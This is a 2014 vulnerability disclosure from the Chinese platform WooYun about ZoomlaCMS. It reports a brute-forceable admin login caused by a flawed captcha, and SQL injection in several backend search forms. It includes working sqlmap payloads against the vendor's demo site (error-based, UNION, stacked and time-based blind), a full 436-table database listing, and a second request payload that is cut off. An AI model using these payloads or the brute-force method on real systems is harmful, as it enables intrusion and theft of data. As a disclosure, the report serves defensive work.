当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070959

漏洞标题:逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当)

相关厂商:逐浪CMS

漏洞作者: 路人甲

提交时间:2014-08-05 19:13

修复时间:2014-11-03 19:14

公开时间:2014-11-03 19:14

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-05: 细节已通知厂商并且等待厂商处理中
2014-08-06: 厂商已经确认,细节仅向厂商公开
2014-08-09: 细节向第三方安全合作伙伴开放
2014-09-30: 细节向核心白帽子及相关领域专家公开
2014-10-10: 细节向普通白帽子公开
2014-10-20: 细节向实习白帽子公开
2014-11-03: 细节向公众公开

简要描述:

RT

详细说明:

问题有两个:
1.验证码设计不当可暴力猜解后台管理员账户密码;
2.后台多处注入漏洞(搜索处)可获取各种敏感信息。

漏洞证明:

#1.验证码设计不当
逐浪后台地址:http://demo.zoomla.cn/Admin/login.aspx
一开始是没有验证码的,所以我爆破,但是发现会提示验证码错误。
填上验证码抓包继续对密码字段爆破,发现可以爆破成功。

zoomla1.jpg


成功进入后台:

zoomla2.jpg


#2.大面积的SQL注入漏洞:
a.首先是商品管理搜索处

zoomla1.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' AND 3515=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+(SELECT (CASE WHEN (3515=3515) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'Cqgx'='Cqgx&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+CHAR(120)+CHAR(81)+CHAR(83)+CHAR(66)+CHAR(119)+CHAR(87)+CHAR(74)+CHAR(73)+CHAR(100)+CHAR(89)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113),NULL-- &ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123'; WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2008
current database: 'demozoomla'


436个表:

Database: demozoomla
[436 tables]
+-----------------------------------+
| ZL_3DMusic |
| ZL_3DPanoramic |
| ZL_3DShop |
| ZL_Accountinfo |
| ZL_AdZone |
| ZL_Adbuy |
| ZL_AddRessList |
| ZL_Advertisement |
| ZL_Agent |
| ZL_Allianceinfo |
| ZL_Answer |
| ZL_Answer_Recode |
| ZL_App |
| ZL_Arrive |
| ZL_ArticleOrders |
| ZL_ArticlePromotion |
| ZL_Ask |
| ZL_AskCommon |
| ZL_Auction |
| ZL_AuditingState |
| ZL_Author |
| ZL_Baike |
| ZL_BaikeEdit |
| ZL_Bbscate |
| ZL_Bbstips |
| ZL_BiaoQian |
| ZL_Bid |
| ZL_Bider |
| ZL_BigLog |
| ZL_BindFlolar |
| ZL_BindPro |
| ZL_BlogAnswer |
| ZL_BlogAsk |
| ZL_BlogContent |
| ZL_BlogLiving |
| ZL_BookRead |
| ZL_BossInfo |
| ZL_C_Announce |
| ZL_C_Article |
| ZL_C_Factory |
| ZL_C_FriendSite |
| ZL_C_Info |
| ZL_C_Photo |
| ZL_C_Plugins |
| ZL_C_RedirectLink |
| ZL_C_soft |
| ZL_C_video |
| ZL_CallNode |
| ZL_CallNote |
| ZL_Card |
| ZL_CardType |
| ZL_Cart |
| ZL_CartPro |
| ZL_Cash |
| ZL_ChangeProduct |
| ZL_ChangeTalk |
| ZL_Chart |
| ZL_Chat |
| ZL_Class |
| ZL_ClassRoom |
| ZL_ClientRequire |
| ZL_Client_Additional |
| ZL_Client_Basic |
| ZL_Client_Enterprise |
| ZL_Client_Penson |
| ZL_CollectionInfo |
| ZL_CollectionItem |
| ZL_Comment |
| ZL_Commodities |
| ZL_CommonModel |
| ZL_CompSecretary |
| ZL_Compete |
| ZL_CompleteHistory |
| ZL_ComponentClass |
| ZL_ComponentPlatform |
| ZL_Content_ScheTask |
| ZL_Correct |
| ZL_Count_Browser |
| ZL_Count_Iplocal |
| ZL_Count_Local |
| ZL_Count_Month |
| ZL_Count_Os |
| ZL_Count_Site |
| ZL_Count_Visitor |
| ZL_Count_Year |
| ZL_Count_dtproperties |
| ZL_Course |
| ZL_Courseware |
| ZL_CpsClick |
| ZL_CreateJS |
| ZL_CrmAuthList |
| ZL_CustomerService |
| ZL_DataList |
| ZL_DataSource |
| ZL_Datadic |
| ZL_Datadiccategory |
| ZL_Defray |
| ZL_Delivier |
| ZL_DocList |
| ZL_DocModel |
| ZL_DocPermission |
| ZL_DownServer |
| ZL_EditWord |
| ZL_EnrollList |
| ZL_ExAnswer |
| ZL_ExAttendance |
| ZL_ExChange |
| ZL_ExClassgroup |
| ZL_ExLecturer |
| ZL_ExStudent |
| ZL_ExStudytime |
| ZL_ExTeacher |
| ZL_ExamPoint |
| ZL_Exam_Class |
| ZL_Exam_Sys_Papers |
| ZL_Exam_Sys_Questions |
| ZL_Exam_Type |
| ZL_Examination |
| ZL_Examinee |
| ZL_Exroom |
| ZL_FTPConfig |
| ZL_Favorite |
| ZL_File |
| ZL_Flow |
| ZL_Frient |
| ZL_GiftCard_User |
| ZL_GiftCard_shop |
| ZL_Grade |
| ZL_GradeCate |
| ZL_Group |
| ZL_GroupBuy |
| ZL_GroupBuyList |
| ZL_GroupFieldPermissions |
| ZL_GroupModel |
| ZL_GuestAnswer |
| ZL_Guestbook |
| ZL_Guestcate |
| ZL_HidTopic |
| ZL_Hits |
| ZL_Honor |
| ZL_IDC_DBList |
| ZL_IDC_DNSSubDom |
| ZL_IDC_DNSTable |
| ZL_IDC_DomainList |
| ZL_IDC_DomainLog |
| ZL_IDC_DomainPrice |
| ZL_IDC_DomainTemp |
| ZL_IDC_Log |
| ZL_IDC_Server |
| ZL_IDC_SiteList |
| ZL_IPUrl |
| ZL_IPclass |
| ZL_IPpara |
| ZL_IServer |
| ZL_IServerReply |
| ZL_Interlocution |
| ZL_InviteRecord |
| ZL_InvtoType |
| ZL_Keyword |
| ZL_Keywords |
| ZL_LinkName |
| ZL_Log |
| ZL_MTit |
| ZL_Magazine |
| ZL_MailIdiograph |
| ZL_MailInfo |
| ZL_MailManage |
| ZL_MailReceive |
| ZL_MailSet |
| ZL_MailTemp |
| ZL_MailType |
| ZL_Manager |
| ZL_Manufacturers |
| ZL_Map |
| ZL_MbClass |
| ZL_MbComment |
| ZL_MbTheme |
| ZL_Mbtopic |
| ZL_Message |
| ZL_MiUserInfo |
| ZL_Microb |
| ZL_Mis |
| ZL_MisApproval |
| ZL_MisAttendance |
| ZL_MisInfo |
| ZL_MisPlan |
| ZL_MisProLevel |
| ZL_MisProcedure |
| ZL_MisSign |
| ZL_MisType |
| ZL_Mis_AppProg |
| ZL_Mis_Model |
| ZL_Model |
| ZL_ModelField |
| ZL_MoneyManage |
| ZL_MuClass |
| ZL_MuPage |
| ZL_MuPic |
| ZL_MuProduct |
| ZL_MuTemp |
| ZL_MultiNode |
| ZL_MySubscription |
| ZL_Node |
| ZL_NodeBindDroit |
| ZL_NodeRole |
| ZL_Node_ModelTemplate |
| ZL_OAC_111 |
| ZL_OA_BC |
| ZL_OA_Document |
| ZL_OA_FreePro |
| ZL_OA_PBTable |
| ZL_OA_Sign |
| ZL_OA_UserConfig |
| ZL_Online |
| ZL_OnlineCusServ |
| ZL_OnlineUsers |
| ZL_OrderBaseField |
| ZL_OrderDelivery |
| ZL_OrderSql |
| ZL_Order_LuckCode |
| ZL_Order_PayLog |
| ZL_Orderinfo |
| ZL_P_Shop |
| ZL_Package |
| ZL_Page |
| ZL_PageReg |
| ZL_PageStyle |
| ZL_PageTemplate |
| ZL_Page_Content |
| ZL_Page_fwefw |
| ZL_Paper_Questions |
| ZL_Papers_System |
| ZL_Papers_User |
| ZL_Passenger |
| ZL_PayPlat |
| ZL_Payment |
| ZL_Permission |
| ZL_Plan |
| ZL_PlanSql |
| ZL_PointGrounp |
| ZL_PointRecord |
| ZL_PointTrans |
| ZL_Present |
| ZL_Print |
| ZL_PrintMode |
| ZL_PrintPic |
| ZL_PrintType |
| ZL_Process |
| ZL_Processes |
| ZL_Project |
| ZL_ProjectAffairs |
| ZL_ProjectBaseField |
| ZL_ProjectCategory |
| ZL_ProjectDiscuss |
| ZL_ProjectField |
| ZL_ProjectType |
| ZL_ProjectWork |
| ZL_Projects |
| ZL_ProjectsBase |
| ZL_ProjectsComments |
| ZL_PromoCount |
| ZL_Promotion |
| ZL_Promotions |
| ZL_Pub |
| ZL_Pub_TW |
| ZL_Pub_WTHD |
| ZL_Pub_WZTP |
| ZL_Pub_ZJDA |
| ZL_Pub_ZXDC |
| ZL_Pub_huodong |
| ZL_QrCode |
| ZL_Question |
| ZL_Questions |
| ZL_Questions_Class |
| ZL_Questions_Knowledge |
| ZL_Questions_Type |
| ZL_Questions_User |
| ZL_RebateOrder |
| ZL_Rebates |
| ZL_Recruitment |
| ZL_RedEnvelope |
| ZL_Redindulgence |
| ZL_Reg_Page |
| ZL_Regsterapi |
| ZL_Result |
| ZL_Role |
| ZL_RolePermissions |
| ZL_RoomActive |
| ZL_RoomActiveJoin |
| ZL_RoomCall |
| ZL_RoomInfo |
| ZL_RoomMessage |
| ZL_RoomNotify |
| ZL_RoomUpFile |
| ZL_RoomUser |
| ZL_SQL |
| ZL_S_FloGoods |
| ZL_S_FloPack |
| ZL_S_shop |
| ZL_Scheme |
| ZL_SchemeInfo |
| ZL_School |
| ZL_ScoreStatics |
| ZL_Search |
| ZL_Sensitivity |
| ZL_ServiceSeat |
| ZL_SettlementInfoList |
| ZL_ShopCommentary |
| ZL_ShopCompete |
| ZL_ShopGrade |
| ZL_ShopLable |
| ZL_ShopNodeinfo |
| ZL_Shopconfig |
| ZL_Shopsearch |
| ZL_Shopsite |
| ZL_ShopsiteClass |
| ZL_SitePas |
| ZL_SitePicAdv |
| ZL_SiteTextAdv |
| ZL_Sns_Active |
| ZL_Sns_ActiveJoin |
| ZL_Sns_ActivePic |
| ZL_Sns_ActiveType |
| ZL_Sns_BlogStyleTable |
| ZL_Sns_BookTable |
| ZL_Sns_CarConfig |
| ZL_Sns_CarLog |
| ZL_Sns_Carlist |
| ZL_Sns_ChatLog |
| ZL_Sns_CollectTable |
| ZL_Sns_CommendCommentOn |
| ZL_Sns_CommentAll |
| ZL_Sns_FileShare |
| ZL_Sns_GSHuatee |
| ZL_Sns_GSReverCricicism |
| ZL_Sns_GSRoom |
| ZL_Sns_GSType |
| ZL_Sns_GatherStrain |
| ZL_Sns_GroupPicCateg |
| ZL_Sns_HomeCollocate |
| ZL_Sns_HomeHeadCollocate |
| ZL_Sns_Kiss |
| ZL_Sns_Log |
| ZL_Sns_LogCriticism |
| ZL_Sns_LookLog |
| ZL_Sns_LotMessage |
| ZL_Sns_LotNote |
| ZL_Sns_Memo |
| ZL_Sns_Messageboard |
| ZL_Sns_MyCar |
| ZL_Sns_MyPose |
| ZL_Sns_PicCateg |
| ZL_Sns_PicCritique |
| ZL_Sns_PicTure |
| ZL_Sns_ProductTable |
| ZL_Sns_ProductTypetable |
| ZL_Sns_ReplayLog |
| ZL_Sns_Report |
| ZL_Sns_SystemBannerTable |
| ZL_Sns_SystemLog |
| ZL_Sns_UserLog |
| ZL_Sns_UserLogType |
| ZL_Sns_UserMoreinfo |
| ZL_Sns_UserShopProduct |
| ZL_Sns_User_R_GS |
| ZL_Sns_User_R_Module |
| ZL_Sns_blogTable |
| ZL_Source |
| ZL_SpecCate |
| ZL_SpecInfo |
| ZL_Special |
| ZL_Stock |
| ZL_StoreStyleTable |
| ZL_Store_reg |
| ZL_Structure |
| ZL_Student |
| ZL_SubscriptionCount |
| ZL_Survey |
| ZL_Trademark |
| ZL_UAgent |
| ZL_U_comp |
| ZL_U_jl |
| ZL_U_zp |
| ZL_Ucenter |
| ZL_UnionInfo |
| ZL_User |
| ZL_UserApp |
| ZL_UserBase |
| ZL_UserBaseField |
| ZL_UserCaritHis |
| ZL_UserCart |
| ZL_UserCartPro |
| ZL_UserClass |
| ZL_UserCoinHis |
| ZL_UserCourse |
| ZL_UserDay |
| ZL_UserExpDomP |
| ZL_UserExpHis |
| ZL_UserFave |
| ZL_UserFriendGroup |
| ZL_UserFriendTable |
| ZL_UserGrade |
| ZL_UserGroup |
| ZL_UserOrderinfo |
| ZL_UserPromotions |
| ZL_UserPurview |
| ZL_UserRecei |
| ZL_UserRegisterIP |
| ZL_UserRoom |
| ZL_UserShop |
| ZL_UserStock |
| ZL_UserStoreTable |
| ZL_UserStoreTypeTable |
| ZL_VJobInfo |
| ZL_VResume |
| ZL_VRoom |
| ZL_VideoHall |
| ZL_VideoHouse |
| ZL_VideoHouseApply |
| ZL_VideoInfo |
| ZL_VideoMessage |
| ZL_VideoRoom |
| ZL_VideoUser |
| ZL_VideoUserFriend |
| ZL_VideoUserGroup |
| ZL_View |
| ZL_ViewHistory |
| ZL_WapArticle |
| ZL_WorkRole |
| ZL_Zone_Advertisement |
| ZL_Zone_Node |
| ZL_Zone_Site |
| ZL_Zone_question |
| ZL_page_app |
| ZL_wxMsg |
| demozoomla_f.ZL_Content_WordChain |
+-----------------------------------+


b.访问评价处:

zoomla1.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"
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
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"
123456%' AND 2825=CONVERT(INT,(SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (2825=2825) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113))) AND '%'='
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"
2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"
??��������
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
1
------WebKitFormBoundary5n6dB9dFzpkAYygr--
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"
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